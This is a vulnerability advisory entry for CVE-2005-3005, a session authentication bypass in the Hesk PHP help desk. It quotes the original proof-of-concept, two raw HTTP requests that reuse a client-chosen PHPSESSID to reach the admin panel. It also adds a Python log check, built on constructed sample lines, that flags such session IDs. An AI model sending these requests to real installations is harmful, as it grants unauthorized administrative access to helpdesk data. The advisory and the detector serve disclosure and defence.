Hesk Session Authentication Bypass Vulnerability

Vulnerability ID: 1109092    Vulnerability type: Access validation error
Published: 2005-09-20    Updated: 2006-01-19
CVE ID: CVE-2005-3005    CNNVD-ID: CNNVD-200509-215
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/26285
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-215
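|Vulnerability Details
Hesk is a free PHP help desk software package. It supports building a web-based ticket support system (service desk) for a website and managing customer requests through a web interface. In Help Desk Software Hesk, a remote attacker can modify the PHPSESSID session ID parameter or cookie and thereby bypass authentication for the (1) admin.php and (2) admin_main.php modules.
|Exploit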
source: http://www.securityfocus.com/bid/14879/info

Hesk is prone to an authentication bypass vulnerability.

Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. 

1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID--!>
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345") <!-- Session ID --!>
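
The following is an added example, not part of the original advisory or of Hesk: a log check that flags requests to the two admin modules carrying a PHPSESSID the server never issued, which is the pattern in the two requests above. The log format (request Cookie and response Set-Cookie recorded per line), the sample lines and the function name are constructed assumptions.

```python
import re

# Assumed log format (constructed): ip "METHOD path" status cookie="..." set_cookie="..."
LINE = re.compile(
    r'(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'cookie="(?P<cookie>[^"]*)" set_cookie="(?P<set_cookie>[^"]*)"'
)
SID = re.compile(r'PHPSESSID=([^;\s"]+)')
ADMIN_MODULES = ("/admin.php", "/admin_main.php")  # the two modules named in the advisory

# Constructed sample: one normal login, then the request pattern shown above.
SAMPLE_LOG = """\
198.51.100.7 "GET /hesk/admin.php" 200 cookie="" set_cookie="PHPSESSID=9f2c4e1ab07d4c55a1e8b3d6f0a97c21; path=/"
198.51.100.7 "POST /hesk/admin.php" 302 cookie="PHPSESSID=9f2c4e1ab07d4c55a1e8b3d6f0a97c21" set_cookie=""
198.51.100.7 "GET /hesk/admin_main.php" 200 cookie="PHPSESSID=9f2c4e1ab07d4c55a1e8b3d6f0a97c21" set_cookie=""
203.0.113.9 "POST /hesk/admin.php" 200 cookie="PHPSESSID=12345" set_cookie=""
203.0.113.9 "GET /hesk/admin_main.php" 200 cookie="PHPSESSID=12345" set_cookie=""
"""

def find_unissued_session_use(log_text):
    """Return admin-module requests whose PHPSESSID was never seen in a Set-Cookie."""
    issued = set()  # session IDs the server handed out within this log window
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]  # ignore any query string
        presented = SID.search(m["cookie"])
        # Check the presented ID before recording this response's Set-Cookie.
        if presented and path.endswith(ADMIN_MODULES) and presented.group(1) not in issued:
            alerts.append((m["ip"], m["method"], path, int(m["status"]), presented.group(1)))
        granted = SID.search(m["set_cookie"])
        if granted:
            issued.add(granted.group(1))
    return alerts

if __name__ == "__main__":
    for alert in find_unissued_session_use(SAMPLE_LOG):
        print("client-chosen session ID on admin module:", alert)
```

Sessions issued before the start of the log window are flagged as well, so run the check over a window longer than the session lifetime.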
|References

Source: BID
Name: 14879
Link: http://www.securityfocus.com/bid/14879
Source: www.phpjunkyard.com
Link: http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
Source: VUPEN
Name: ADV-2005-1792
Link: http://www.frsirt.com/english/advisories/2005/1792
Source: SECUNIA
Name: 16859
Link: http://secunia.com/advisories/16859
Source: BUGTRAQ
Name: 20050920 Hesk Session ID Validation Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112724743530521&w=2